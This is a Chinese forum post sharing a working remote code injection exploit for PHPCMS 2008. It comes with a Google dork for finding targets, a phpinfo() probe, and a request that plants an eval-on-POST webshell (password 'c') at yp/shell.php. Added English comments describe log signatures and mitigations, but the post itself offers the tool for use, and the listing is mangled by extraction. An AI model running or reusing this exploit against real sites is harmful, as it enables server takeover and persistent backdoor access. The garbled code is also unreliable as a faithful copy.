作者:百变睛灵_345 | 来源:互联网 | 2017-11-10 19:02
玩滥了,丢给大家玩吧。现在命中率还不错哦。直接GETSHELL。一句话密码为c
EXP:
#!/usr/bin/php
// NOTE(review): this listing was mangled by HTML extraction and is not valid
// PHP as shown. The code is kept byte-for-byte so the request shapes below can
// serve as detection references.
//
// Purpose (per the banner and the request paths below): proof-of-concept for a
// code-evaluation flaw reached through the `pagesize` query parameter of
// yp/product.php in PHPCMS 2008.
//
// Defender view: what this traffic leaves in access logs / WAF telemetry:
//   * GET <path>yp/product.php with the sequence `{${` inside `pagesize`
//   * the fixed header "User-Agent: Payb-Agent" (set in httpRequestGET; a weak
//     signal on its own because it is a plain string in the script)
//   * a follow-up GET for <path>yp/shell.php
// Mitigation: accept only an integer for `pagesize` before it reaches any code
// path that evaluates strings (TODO confirm the sink against the PHPCMS
// source), deny the web-server account write access to the web root, and audit
// the yp/ directory for unexpected .php files.
print_r('
+---------------------------------------------------------------------------+
PHPCMS Remote Code Inject GetShell Exploit
Google Dork:Powered by Phpcms 2008
code by secr
+---------------------------------------------------------------------------+
');
if ($argc < 3) {
// Fewer than two command-line arguments: print the usage text and stop.
print_r(&#39;
+---------------------------------------------------------------------------+
Usage: php &#39;.$argv[0].&#39; host path
host: target server (ip/hostname)
path: path to phpcms
Example:
php &#39;.$argv[0].&#39; localhost /phpcms/
+---------------------------------------------------------------------------+
&#39;);
exit;
}
// Silence all PHP error output and lift the execution time limit.
error_reporting(0);
set_time_limit(0);
// Host and application base path are taken directly from the command line.
$host = $argv[1];
$path = $argv[2];
// Second-stage request: `pagesize` carries a `{${...}}` expression that calls
// fopen()/fputs() with base64-encoded arguments. The encoding keeps the file
// name and contents out of the URL in clear text, so signatures should key on
// the `{${` construct in `pagesize` rather than on literal strings. The file
// written is presumably the yp/shell.php requested further down.
$exp =&#39;/yp/product.php?view_type=1&catid=&pagesize={${fputs(fopen(base64_decode(c2hlbGwucGhw),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}}&areaname=0&order=&#39;;
// Check whether the vulnerability is present: the probe puts a phpinfo() call
// in `pagesize` and treats "php.ini" in the response as confirmation.
echo "[+] Try to determine the Bug....n";
$returnstr=httpRequestGET(&#39;/yp/product.php?view_type=1&catid=&pagesize={${phpinfo()}}&areaname=&order=&#39;);
if(preg_match(&#39;/(php.ini)/i&#39;,$returnstr)){
echo("[+] This site has Bug!We Will Be Try To Exploit Itn");
}
else
{
exit("[-] Exploit Failed! This site has No Bug!n");
}
// If the probe matched, send the second-stage request held in $exp.
echo "[+] Try to create webshell....n";
httpRequestGET($exp);
$content=httpRequestGET("/yp/shell.php");
// After the second-stage request, fetch yp/shell.php and look for the "ok"
// marker in the response; its presence is taken to mean the file was created.
//print_r($content);
if(strpos($content,&#39;ok&#39;)){
echo "[+] Expoilt successfully....n";
echo "[+] Webshell:http://$host{$path}yp/shell.phpn";
}else{
exit("[-] Exploit Failed!n");
}
//Function that simulates a POST or GET request.
// Send one HTTP/1.1 request over a raw socket and return everything received.
//
// $url is appended to the global $path to form the request target; the global
// $host supplies both the Host header and the name that is resolved for the
// connection. Returns the response exactly as read from the socket (status
// line, headers and body together).
//
// Detection note: every request built here carries the fixed header
// "User-Agent: Payb-Agent" and "Connection: Close", and is sent in clear text
// to TCP port 80.
function httpRequestGET($url){
global $host, $path;
// $method is never defined in this scope, so the ternary always yields GET.
$method=$method?&#39;POST&#39;:&#39;GET&#39;;
$payload = $method." ".$path.$url." HTTP/1.1rn";
$payload .= "Accept: */*rn";
$payload .= "User-Agent: Payb-Agentrn";
$payload .= "Host: " . $host . "rn";
$payload .= "Connection: Closernrn";
// Resolve the host name and connect on port 80 (no TLS).
$fp = fsockopen(gethostbyname($host), 80);
if (!$fp) {
// Connection failed: report it and stop the whole script.
echo &#39;No response from &#39;.$host; die;
}
fputs($fp, $payload);
$resp = &#39;&#39;;
// Accumulate the response in reads of up to 1024 bytes until end of stream;
// the socket is never explicitly closed.
while ($fp && !feof($fp))
$resp .= fread($fp, 1024);
return $resp;
}
?>